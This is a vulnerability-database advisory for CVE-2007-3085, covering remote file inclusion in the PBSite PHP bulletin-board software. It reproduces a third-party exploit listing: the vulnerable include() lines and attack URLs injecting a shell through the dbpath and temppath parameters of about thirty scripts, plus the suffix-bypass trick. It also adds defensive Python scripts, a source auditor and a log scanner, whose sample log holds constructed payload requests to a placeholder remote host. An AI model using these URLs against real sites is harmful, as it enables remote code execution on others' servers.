PBSite PHP Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID 1190316 Vulnerability type Unknown (the record's title and details describe PHP remote file inclusion)
Published 2007-06-06 Updated 2007-06-06
CVE ID CVE-2007-3085 CNNVD ID CNNVD-200706-096
Platform N/A CVSS score 7.5
|Sources
https://www.securityfocus.com/bid/86106
https://cxsecurity.com/issue/WLB-2007060039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-096
|Details
PBSite contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying a URL in (1) the dbpath parameter of (a) useronline.php, (b) ucp.php, (c) setcookie.php, (d) sendpm.php, (e) search.php, (f) register.php, (g) profile.php, (h) post.php, (i) pmpshow.php, (j) pm.php, (k) ntopic.php, (l) nreply.php, (m) news.php, (n) memberslist.php, (o) logout.php, (p) login.php, (q) index.php, (r) help.php, (s) forum.php, (t) error.php, (u) editpost.php, (v) delpost.php, (w) delpm.php, (x) confirm.php, (y) board.php, (z) admin2.php, (aa) admin.php or (bb) templates/pb/css/formstyles.php, or (2) the temppath parameter of (a) useronline.php, (c) setcookie.php, (e) search.php, (f) register.php, (h) post.php, (l) nreply.php, (m) news.php, (o) logout.php, (p) login.php, (q) index.php, (r) help.php, (s) forum.php, (t) error.php, (w) delpm.php, (x) confirm.php or (y) board.php.

The affected scripts pass $dbpath and $temppath straight into include() and nothing in the quoted excerpts assigns them first, so the values are attacker-controlled only when PHP's register_globals is on; fetching the remote file additionally needs allow_url_fopen (PHP before 5.2) or allow_url_include (PHP 5.2 and later) enabled. Because each script appends a fixed suffix such as "/settings.php" to the supplied value, a working payload URL ends in "?" so that the suffix lands in the query string of the request to the attacker's server. The same excerpts also concatenate $language, $template, $cat, $fid and $pid into include paths; those parameters are outside this CVE, but a fix should validate them as well rather than only dbpath and temppath.
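The code excerpts in the exploit section all share one shape: the first component of an include() path is a bare variable. The Python script below is an added example, not PBSite code and not part of the original advisory. It audits PHP source for that pattern and, run over a constructed sample built from the advisory's own include lines (plus one safe line for contrast), re-derives which files take dbpath and which also take temppath. It only reports the variable at the head of the path; a variable in a later position (such as $language here) is a traversal candidate that this scanner deliberately leaves to a separate check.

```python
"""Find include/require statements whose path is rooted in a PHP variable.

Added example for the PBSite RFI advisory; not the project's code. The sample
sources below are constructed from the include lines the advisory quotes.
"""
import re

# Matches include / include_once / require / require_once whose leading path
# component is a variable, in either of the two forms PBSite uses:
#   include($dbpath."/settings.php");                      (concatenation)
#   include_once("$temppath/$template/language/x.php");    (interpolation)
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*'
    r'(?:\$(?P<concat>\w+)\s*\.|"\$(?P<interp>\w+)[/"])'
)


def tainted_include_vars(php_source):
    """Ordered, de-duplicated names of variables that root an include path."""
    found = []
    for m in INCLUDE_RE.finditer(php_source):
        name = m.group("concat") or m.group("interp")
        if name not in found:
            found.append(name)
    return found


def audit(files):
    """files: {relative path: source text}.

    Returns {path: [variable names]} for every file with at least one
    variable-rooted include. Under register_globals each listed name is a
    request parameter the attacker can point at a remote URL.
    """
    report = {}
    for path, src in files.items():
        names = tainted_include_vars(src)
        if names:
            report[path] = names
    return report


# Constructed sample: include lines quoted in the advisory for three files,
# plus a hypothetical safe.php that anchors the path to the script directory.
SAMPLE = {
    "useronline.php": (
        'include($dbpath."/settings.php");\n'
        'include($temppath."/pb/language/lang_".$language.".php");\n'
    ),
    "login.php": (
        'include($dbpath."/settings.php");\n'
        'include_once("$temppath/$template/language/lang_$language.php");\n'
    ),
    "sendpm.php": 'include($dbpath."/settings.php");\n',
    "safe.php": 'include(dirname(__FILE__)."/settings.php");\n',
}

if __name__ == "__main__":
    for path, names in audit(SAMPLE).items():
        print(path, "->", ", ".join("$" + n for n in names))
```

Running it over a real checkout means reading each .php file into the dictionary; the regex is intentionally narrow (it ignores string-literal and dirname(__FILE__)-rooted includes) so that every hit is worth a manual look.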
|Exploit
script: PBSite - PHP Bulletin Site | CMS ====> RFI

url: http://sourceforge.net/project/showfiles.php?group_id=88114

author: titanichacker (the-modest-pirate (at) hotmail (dot) com [email concealed])

contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%
bug in:   %%%
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./pmpshow.php

include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%
./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php

include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%
exploit:%%
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbpath=[shell]
%%%%%
http://victim/path/sendpm.php?dbpath=[shell]
%%%%%%%
http://victim/path/search.php?dbpath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbpath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbpath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbpath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbpath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbpath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbpath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbpath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbpath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbpath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%%
http://victim/path/login.php?dbpath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
http://victim/path/index.php?dbpath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbpath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbpath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbpath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbpath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbpath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbpath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbpath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbpath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbpath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbpath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%
thanx
%%%%%%%%%
         cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & 
milw0rm & xp10
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%
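To spot attempts against the exploit URLs above in web-server logs, the Python script below is an added example and not part of the advisory. It parses combined-format access-log lines, decodes each query string and flags any dbpath or temppath value that begins with a URL scheme or a PHP stream wrapper (php://, data:// and similar, which allow_url_include also honours). The log lines are constructed for the example; the parameter names are the ones the advisory lists, and the trailing "?" in the first sample payload is the usual trick for swallowing the "/settings.php" suffix the script appends.

```python
"""Flag dbpath/temppath remote-include attempts in access logs.

Added example for the PBSite RFI advisory; not part of the advisory itself.
Log lines below are constructed; only the parameter names come from the page.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request parameters the advisory shows flowing into include() in PBSite.
RFI_PARAMS = {"dbpath", "temppath"}

# Values that redirect include() away from the intended directory: remote URL
# schemes and PHP stream wrappers. Case-insensitive because PHP is.
REMOTE_RE = re.compile(r"^(?:https?|ftps?)://|^(?:php|data|expect|phar)://", re.I)

# Apache/nginx "combined" format up to the status code:
# client ident user [date] "METHOD target HTTP/x.y" status ...
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target):
    """Return [(param, decoded value)] for include-controlling parameters in
    the request target whose value points at a remote URL or stream wrapper."""
    parts = urlsplit(target)
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded
        # payloads such as http%253A%252F%252F... at the cost of decoding
        # legitimate literal '%' sequences too, which is acceptable here.
        value = unquote(value)
        if key.lower() in RFI_PARAMS and REMOTE_RE.search(value):
            hits.append((key, value))
    return hits


def scan(lines):
    """Scan log lines and return one finding dict per suspicious parameter."""
    findings = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip, do not crash
        for param, value in classify(m.group("target")):
            findings.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "param": param,
                "value": value,
                "status": int(m.group("status")),
            })
    return findings


# Constructed sample log: two attacks, one harmless dbpath value, and a URL
# in a parameter that does not reach include().
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2007:10:15:02 +0000] '
    '"GET /forum/index.php?dbpath=http://198.51.100.7/c.txt? HTTP/1.0" 200 1523',
    '203.0.113.5 - - [02/Jun/2007:10:15:03 +0000] '
    '"GET /forum/login.php?temppath=php%3A%2F%2Finput HTTP/1.0" 200 410',
    '192.0.2.9 - - [02/Jun/2007:10:16:44 +0000] '
    '"GET /forum/index.php?dbpath=db HTTP/1.1" 200 1523',
    '192.0.2.9 - - [02/Jun/2007:10:16:50 +0000] '
    '"GET /forum/search.php?q=http://example.com HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']} ({f['status']})")
```

A 200 status on a flagged request is not proof of compromise (PBSite returns a page either way), so treat each finding as a lead and check the web server's outbound connections or the attacker host named in the value.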
|Affected products
PBSite PBSite 0
|References

Source: XF
Name: pbsite-dbpathtemppath-file-include(34675)
Link: http://xforce.iss.net/xforce/xfdb/34675
Source: BUGTRAQ
Name: 20070602 PBSite - PHP Bulletin Site | CMS ====> RFI
Link: http://www.securityfocus.com/archive/1/archive/1/470347/100/0/threaded
Source: BUGTRAQ
Name: 20070601 PBSite - PHP Bulletin Site | CMS ====> RFI
Link: http://www.securityfocus.com/archive/1/archive/1/470239/100/0/threaded
Source: OSVDB
Name: 38786
Link: http://osvdb.org/38786
Source: OSVDB
Name: 38785
Link: http://osvdb.org/38785
Source: OSVDB
Name: 38784
Link: http://osvdb.org/38784
Source: OSVDB
Name: 38783
Link: http://osvdb.org/38783
Source: OSVDB
Name: 38782
Link: http://osvdb.org/38782
Source: OSVDB
Name: 38781
Link: http://osvdb.org/38781
Source: OSVDB
Name: 38780
Link: http://osvdb.org/38780
Source: OSVDB
Name: 38779
Link: http://osvdb.org/38779
Source: OSVDB
Name: 38778
Link: http://osvdb.org/38778
Source: OSVDB
Name: 38777
Link: http://osvdb.org/38777
Source: OSVDB
Name: 38776
Link: http://osvdb.org/38776
Source: OSVDB
Name: 38775
Link: http://osvdb.org/38775
Source: OSVDB
Name: 38774
Link: http://osvdb.org/38774
Source: OSVDB
Name: 38773
Link: http://osvdb.org/38773
Source: OSVDB
Name: 38772
Link: http:/